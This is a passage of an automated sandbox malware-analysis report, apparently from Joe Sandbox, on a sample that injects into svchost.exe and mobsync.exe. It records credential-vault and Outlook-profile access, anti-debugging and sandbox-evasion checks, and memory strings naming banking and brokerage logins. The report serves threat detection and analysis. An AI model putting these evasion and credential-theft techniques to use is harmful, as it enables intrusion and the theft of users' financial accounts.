Source: C:\Windows\SysWOW64\mobsync.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\vdqIvPNRsFkuIPyVUKWYPmxKViehkAcZdSQMyQDe\ldZEVEbpOrO.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\vdqIvPNRsFkuIPyVUKWYPmxKViehkAcZdSQMyQDe\ldZEVEbpOrO.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\vdqIvPNRsFkuIPyVUKWYPmxKViehkAcZdSQMyQDe\ldZEVEbpOrO.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\vdqIvPNRsFkuIPyVUKWYPmxKViehkAcZdSQMyQDe\ldZEVEbpOrO.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\vdqIvPNRsFkuIPyVUKWYPmxKViehkAcZdSQMyQDe\ldZEVEbpOrO.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\vdqIvPNRsFkuIPyVUKWYPmxKViehkAcZdSQMyQDe\ldZEVEbpOrO.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\mobsync.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source: tfWjjV1LdT.exe

Static file information: File size 1225216 > 1048576

Source: tfWjjV1LdT.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: tfWjjV1LdT.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: tfWjjV1LdT.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: tfWjjV1LdT.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: tfWjjV1LdT.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: tfWjjV1LdT.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: tfWjjV1LdT.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: mobsync.pdbGCTL source: svchost.exe, 00000002.00000003.2272782502.000000000322B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2272687879.000000000322C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2272797375.0000000003242000.00000004.00000020.00020000.00000000.sdmp, ldZEVEbpOrO.exe, 00000004.00000002.3896193595.000000000168E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: ldZEVEbpOrO.exe, 00000004.00000000.2229278748.000000000090E000.00000002.00000001.01000000.00000005.sdmp, ldZEVEbpOrO.exe, 00000006.00000000.2382349293.000000000090E000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: wntdll.pdbUGP source: tfWjjV1LdT.exe, 00000000.00000003.2085455684.0000000003590000.00000004.00001000.00020000.00000000.sdmp, tfWjjV1LdT.exe, 00000000.00000003.2085591228.0000000003730000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2212680424.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2307995394.0000000003800000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2307995394.000000000399E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2210467836.0000000003400000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 00000005.00000002.3896686237.0000000004CF0000.00000040.00001000.00020000.00000000.sdmp, mobsync.exe, 00000005.00000002.3896686237.0000000004E8E000.00000040.00001000.00020000.00000000.sdmp, mobsync.exe, 00000005.00000003.2311789214.0000000004B48000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 00000005.00000003.2309031499.000000000499E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: tfWjjV1LdT.exe, 00000000.00000003.2085455684.0000000003590000.00000004.00001000.00020000.00000000.sdmp, tfWjjV1LdT.exe, 00000000.00000003.2085591228.0000000003730000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2212680424.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2307995394.0000000003800000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2307995394.000000000399E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2210467836.0000000003400000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 00000005.00000002.3896686237.0000000004CF0000.00000040.00001000.00020000.00000000.sdmp, mobsync.exe, 00000005.00000002.3896686237.0000000004E8E000.00000040.00001000.00020000.00000000.sdmp, mobsync.exe, 00000005.00000003.2311789214.0000000004B48000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 00000005.00000003.2309031499.000000000499E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mobsync.pdb source: svchost.exe, 00000002.00000003.2272782502.000000000322B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2272687879.000000000322C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2272797375.0000000003242000.00000004.00000020.00020000.00000000.sdmp, ldZEVEbpOrO.exe, 00000004.00000002.3896193595.000000000168E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: mobsync.exe, 00000005.00000002.3895710577.0000000002FD9000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 00000005.00000002.3897126671.000000000531C000.00000004.10000000.00040000.00000000.sdmp, ldZEVEbpOrO.exe, 00000006.00000002.3896751576.00000000026FC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2613143278.000000002DC3C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: mobsync.exe, 00000005.00000002.3895710577.0000000002FD9000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 00000005.00000002.3897126671.000000000531C000.00000004.10000000.00040000.00000000.sdmp, ldZEVEbpOrO.exe, 00000006.00000002.3896751576.00000000026FC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2613143278.000000002DC3C000.00000004.80000000.00040000.00000000.sdmp

Source: tfWjjV1LdT.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: tfWjjV1LdT.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: tfWjjV1LdT.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: tfWjjV1LdT.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: tfWjjV1LdT.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\tfWjjV1LdT.exe

Code function: 0_2_00694B37 LoadLibraryA,GetProcAddress,

0_2_00694B37

Source: C:\Users\user\Desktop\tfWjjV1LdT.exe	Code function: 0_2_0069C4C6 push A30069BAh; retn 0069h	0_2_0069C50D
Source: C:\Users\user\Desktop\tfWjjV1LdT.exe	Code function: 0_2_006B8945 push ecx; ret	0_2_006B8958
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004143C1 push cs; ret	2_2_004143C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00403070 push eax; ret	2_2_00403072
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004120AF push ebp; retf	2_2_004120B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00418172 push esi; retf	2_2_0041817D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040AADE push ebp; iretd	2_2_0040AAE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00414344 push cs; ret	2_2_004143C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00417C7C push esi; iretd	2_2_00417C7F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00413D3D push esp; ret	2_2_00413D3E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040CE68 push ecx; retf	2_2_0040CE6B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0380225F pushad ; ret	2_2_038027F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038027FA pushad ; ret	2_2_038027F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038309AD push ecx; mov dword ptr [esp], ecx	2_2_038309B6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0380283D push eax; iretd	2_2_03802858
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03801368 push eax; iretd	2_2_03801369

Source: C:\Users\user\Desktop\tfWjjV1LdT.exe	Code function: 0_2_006948D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		0_2_006948D7
Source: C:\Users\user\Desktop\tfWjjV1LdT.exe	Code function: 0_2_00715376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		0_2_00715376

Source: C:\Users\user\Desktop\tfWjjV1LdT.exe

Code function: 0_2_006B3187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_006B3187

Source: C:\Users\user\Desktop\tfWjjV1LdT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\tfWjjV1LdT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\tfWjjV1LdT.exe	API/Special instruction interceptor: Address: D53E54
Source: C:\Windows\SysWOW64\mobsync.exe	API/Special instruction interceptor: Address: 7FF8C88ED324
Source: C:\Windows\SysWOW64\mobsync.exe	API/Special instruction interceptor: Address: 7FF8C88ED944
Source: C:\Windows\SysWOW64\mobsync.exe	API/Special instruction interceptor: Address: 7FF8C88ED504
Source: C:\Windows\SysWOW64\mobsync.exe	API/Special instruction interceptor: Address: 7FF8C88ED544
Source: C:\Windows\SysWOW64\mobsync.exe	API/Special instruction interceptor: Address: 7FF8C88ED1E4
Source: C:\Windows\SysWOW64\mobsync.exe	API/Special instruction interceptor: Address: 7FF8C88F0154
Source: C:\Windows\SysWOW64\mobsync.exe	API/Special instruction interceptor: Address: 7FF8C88EDA44

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_0387096E rdtsc

2_2_0387096E

Source: C:\Users\user\Desktop\tfWjjV1LdT.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

graph_0-102296

Source: C:\Users\user\Desktop\tfWjjV1LdT.exe	API coverage: 4.6 %
Source: C:\Windows\SysWOW64\svchost.exe	API coverage: 0.6 %

Source: C:\Windows\SysWOW64\mobsync.exe TID: 7056	Thread sleep count: 43 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe TID: 7056	Thread sleep time: -86000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\vdqIvPNRsFkuIPyVUKWYPmxKViehkAcZdSQMyQDe\ldZEVEbpOrO.exe TID: 1292	Thread sleep time: -50000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\mobsync.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\mobsync.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\tfWjjV1LdT.exe	Code function: 0_2_006F445A GetFileAttributesW,FindFirstFileW,FindClose,	0_2_006F445A
Source: C:\Users\user\Desktop\tfWjjV1LdT.exe	Code function: 0_2_006FC6D1 FindFirstFileW,FindClose,	0_2_006FC6D1
Source: C:\Users\user\Desktop\tfWjjV1LdT.exe	Code function: 0_2_006FC75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_006FC75C
Source: C:\Users\user\Desktop\tfWjjV1LdT.exe	Code function: 0_2_006FEF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_006FEF95
Source: C:\Users\user\Desktop\tfWjjV1LdT.exe	Code function: 0_2_006FF0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_006FF0F2
Source: C:\Users\user\Desktop\tfWjjV1LdT.exe	Code function: 0_2_006FF3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_006FF3F3
Source: C:\Users\user\Desktop\tfWjjV1LdT.exe	Code function: 0_2_006F37EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_006F37EF
Source: C:\Users\user\Desktop\tfWjjV1LdT.exe	Code function: 0_2_006F3B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_006F3B12
Source: C:\Users\user\Desktop\tfWjjV1LdT.exe	Code function: 0_2_006FBCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_006FBCBC

Source: C:\Users\user\Desktop\tfWjjV1LdT.exe

Code function: 0_2_006949A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_006949A0

Source: 10O4645j.5.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: 10O4645j.5.dr	Binary or memory string: discord.comVMware20,11696428655f
Source: 10O4645j.5.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: 10O4645j.5.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: 10O4645j.5.dr	Binary or memory string: global block list test formVMware20,11696428655
Source: 10O4645j.5.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: 10O4645j.5.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: 10O4645j.5.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: 10O4645j.5.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: 10O4645j.5.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: 10O4645j.5.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: 10O4645j.5.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: 10O4645j.5.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: 10O4645j.5.dr	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: 10O4645j.5.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: mobsync.exe, 00000005.00000002.3895710577.0000000002FD9000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000008.00000002.2616087729.000001BAEDBEC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: ldZEVEbpOrO.exe, 00000006.00000002.3896485819.0000000000B3F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll{{
Source: 10O4645j.5.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: 10O4645j.5.dr	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: 10O4645j.5.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: 10O4645j.5.dr	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: mobsync.exe, 00000005.00000002.3898701952.000000000813C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ice.comVMware20,11696428655s
Source: 10O4645j.5.dr	Binary or memory string: AMC password management pageVMware20,11696428655
Source: 10O4645j.5.dr	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: 10O4645j.5.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: 10O4645j.5.dr	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: 10O4645j.5.dr	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: 10O4645j.5.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: mobsync.exe, 00000005.00000002.3898701952.000000000813C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,116964286557&f
Source: 10O4645j.5.dr	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: 10O4645j.5.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: 10O4645j.5.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: 10O4645j.5.dr	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: 10O4645j.5.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: 10O4645j.5.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655

Source: C:\Users\user\Desktop\tfWjjV1LdT.exe

API call chain: ExitProcess graph end node

graph_0-101245

Source: C:\Windows\SysWOW64\svchost.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_0387096E rdtsc

2_2_0387096E

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_00417543 LdrLoadDll,

2_2_00417543

Source: C:\Users\user\Desktop\tfWjjV1LdT.exe

Code function: 0_2_00703F09 BlockInput,

0_2_00703F09

Source: C:\Users\user\Desktop\tfWjjV1LdT.exe

Code function: 0_2_00693B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00693B3A

Source: C:\Users\user\Desktop\tfWjjV1LdT.exe

Code function: 0_2_006C5A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

0_2_006C5A7C

Source: C:\Users\user\Desktop\tfWjjV1LdT.exe

Code function: 0_2_00694B37 LoadLibraryA,GetProcAddress,

0_2_00694B37

Source: C:\Users\user\Desktop\tfWjjV1LdT.exe	Code function: 0_2_00D540C0 mov eax, dword ptr fs:[00000030h]	0_2_00D540C0
Source: C:\Users\user\Desktop\tfWjjV1LdT.exe	Code function: 0_2_00D54120 mov eax, dword ptr fs:[00000030h]	0_2_00D54120
Source: C:\Users\user\Desktop\tfWjjV1LdT.exe	Code function: 0_2_00D52A90 mov eax, dword ptr fs:[00000030h]	0_2_00D52A90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0382E388 mov eax, dword ptr fs:[00000030h]	2_2_0382E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0382E388 mov eax, dword ptr fs:[00000030h]	2_2_0382E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0382E388 mov eax, dword ptr fs:[00000030h]	2_2_0382E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385438F mov eax, dword ptr fs:[00000030h]	2_2_0385438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385438F mov eax, dword ptr fs:[00000030h]	2_2_0385438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03828397 mov eax, dword ptr fs:[00000030h]	2_2_03828397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03828397 mov eax, dword ptr fs:[00000030h]	2_2_03828397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03828397 mov eax, dword ptr fs:[00000030h]	2_2_03828397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038EC3CD mov eax, dword ptr fs:[00000030h]	2_2_038EC3CD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0383A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0383A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0383A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0383A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0383A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0383A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038383C0 mov eax, dword ptr fs:[00000030h]	2_2_038383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038383C0 mov eax, dword ptr fs:[00000030h]	2_2_038383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038383C0 mov eax, dword ptr fs:[00000030h]	2_2_038383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038383C0 mov eax, dword ptr fs:[00000030h]	2_2_038383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B63C0 mov eax, dword ptr fs:[00000030h]	2_2_038B63C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038DE3DB mov eax, dword ptr fs:[00000030h]	2_2_038DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038DE3DB mov eax, dword ptr fs:[00000030h]	2_2_038DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038DE3DB mov ecx, dword ptr fs:[00000030h]	2_2_038DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038DE3DB mov eax, dword ptr fs:[00000030h]	2_2_038DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038D43D4 mov eax, dword ptr fs:[00000030h]	2_2_038D43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038D43D4 mov eax, dword ptr fs:[00000030h]	2_2_038D43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038403E9 mov eax, dword ptr fs:[00000030h]	2_2_038403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038403E9 mov eax, dword ptr fs:[00000030h]	2_2_038403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038403E9 mov eax, dword ptr fs:[00000030h]	2_2_038403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038403E9 mov eax, dword ptr fs:[00000030h]	2_2_038403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038403E9 mov eax, dword ptr fs:[00000030h]	2_2_038403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038403E9 mov eax, dword ptr fs:[00000030h]	2_2_038403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038403E9 mov eax, dword ptr fs:[00000030h]	2_2_038403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038403E9 mov eax, dword ptr fs:[00000030h]	2_2_038403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0384E3F0 mov eax, dword ptr fs:[00000030h]	2_2_0384E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0384E3F0 mov eax, dword ptr fs:[00000030h]	2_2_0384E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0384E3F0 mov eax, dword ptr fs:[00000030h]	2_2_0384E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038663FF mov eax, dword ptr fs:[00000030h]	2_2_038663FF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386A30B mov eax, dword ptr fs:[00000030h]	2_2_0386A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386A30B mov eax, dword ptr fs:[00000030h]	2_2_0386A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386A30B mov eax, dword ptr fs:[00000030h]	2_2_0386A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0382C310 mov ecx, dword ptr fs:[00000030h]	2_2_0382C310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03850310 mov ecx, dword ptr fs:[00000030h]	2_2_03850310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03908324 mov eax, dword ptr fs:[00000030h]	2_2_03908324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03908324 mov ecx, dword ptr fs:[00000030h]	2_2_03908324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03908324 mov eax, dword ptr fs:[00000030h]	2_2_03908324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03908324 mov eax, dword ptr fs:[00000030h]	2_2_03908324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]	2_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]	2_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]	2_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]	2_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]	2_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]	2_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]	2_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]	2_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]	2_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]	2_2_038B2349
